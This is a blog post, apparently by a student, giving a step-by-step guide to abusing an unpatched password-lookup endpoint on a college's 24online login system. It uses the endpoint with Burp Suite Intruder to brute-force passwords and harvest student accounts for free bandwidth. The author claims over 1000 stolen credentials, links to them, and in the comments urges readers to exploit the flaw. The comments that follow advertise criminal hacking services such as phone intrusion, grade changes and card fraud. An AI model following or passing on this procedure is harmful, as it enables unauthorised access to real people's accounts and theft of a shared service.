(I'm not a computer expert nor am i from CS branch, i know how computers work and have got a little bit of common sense so please don't expect a detailed report in this post if you need help feel free to mail me)
I don't want to brag about how i figured this out and all that, let me get to the point.
Step: 1
check the source of I-ON login page at http://172.16.16.16/24online/webpages/client.jsp
just click "ctrl+u"
Step: 2
search for "fetch" by clicking "ctrl+f"
Step: 3
now copy the URL "http://1.186.15.77/24online/servlet/AjaxManager?mode=2000&nasip=1.186.23.37&password="and paste it in your address bar.
now copy the URL "http://1.186.15.77/24online/servlet/AjaxManager?mode=2000&nasip=1.186.23.37&password="and paste it in your address bar.
Step: 4
you can paste any password of your choice after "password=" in the URL and you should get a response with a the registration number to whom the password belongs.
example:
lets use a random word "crab"
If you just want 1 account then you can try this until you find what you are searching for, 40 GB is great for such little work.
I have extracted more than 1000 usernames and passwords may be more that is more than 40 TB of bandwidth per month. well not all work, most of them are old accounts, and you can crack the most toughest password with this method but requires a lot of patience.
Step: 5
download and install Burp suite.
I used to use this tool for modifying request and find coupon codes on red bus, for our job Burp Suite works like a charm.
after installation open up Burp Suite
by default a proxy will be opened at "127.0.0.1:8080"
Step: 6
set your browser proxy to "127.0.0.1:8080"
I'm using Mozilla Firefox
you can change proxy using Options>Advanced>Network>Connection>Settings>Manual Proxy Config.
Step: 7
now make a request using the address bar as you did before,
"http://1.186.15.77/24online/servlet/AjaxManager?mode=2000&nasip=1.186.23.37&password=0000"
now get back to Burp and open proxy tab you should see a request like this.
Step: 8
now press "ctrl+i" to send the request to intruder tab and open the intruder tab. inside intruder go to positions tab.
now press "ctrl+i" to send the request to intruder tab and open the intruder tab. inside intruder go to positions tab.
Step: 9
Now edit the text by removing $ sign from nasip and mode. your final text should look like this.
Step: 10
Get payload,
you can try any payload here you can either brute force all possible combinations which will take hours to days to complete.
or you can grab all dictionary words, from here.
copy all the text using "ctrl+A" and "ctrl+C"
now go to payloads and paste the list using paste button. your tab should look like this now.
Switch to options tab and change the values as shown below, you can go higher than 127 threads, if you have a good bandwidth, but for some reason i was not able to go beyond this value.
Step: 11
Now go to Intruder menu click on start attack, you will see all the responses for every single password the suite tries,you can also export the results to a single file using save function. here is my list.
This loophole was around since I joined MIT back in 2013, it is still there even after reporting multiple times. have fun and happy hacking :)
if you are too lazy to do any of this here is a link to few passwords that I managed to extract.
lol.....does this IDs work?
ReplyDeleteSome of them still do but the whole point here is the exploit, its still not patched so make use of it, you can then dig your own set of id's and passwords.
ReplyDeleteDoesn't seem to work now
DeleteThis professional hacker is absolutely reliable and I strongly recommend him for any type of hack you require. I know this because I have hired him severally for various hacks and he has never disappointed me nor any of my friends who have hired him too, he can help you with any of the following hacks:
ReplyDelete-Phone hacks (remotely)
-Credit repair
-Bitcoin recovery (any cryptocurrency)
-Make money from home (USA only)
-Social media hacks
-Website hacks
-Erase criminal records (USA & Canada only)
-Grade change
Email:cloudanonymoushacking247@gmail.com
ReplyDeleteAre you desperately in need of a hacker in any area of your life??? then you can contact; ( www.hackintechnology.com services like; -hack into your cheating partner's phone(whatsapp,bbm.gmail,icloud,facebook, twitter,snap chat and others) -Sales of Blank ATM cards. -hack into email accounts and trace email location -all social media accounts, -school database to clear or change grades, -Retrieval of lost file/documents -DUIs -company records and systems, -Bank accounts,Paypal accounts -Credit cards hacker -Credit score hack -Monitor any phone and email address -Websites hacking, pentesting. -IP addresses and people tracking. -Hacking courses and classes CONTACT THEM= hackintechnologyatgmaildotcom or whatsapp +12132951376 their services are the best on the market and 100% security and discreet work is guarante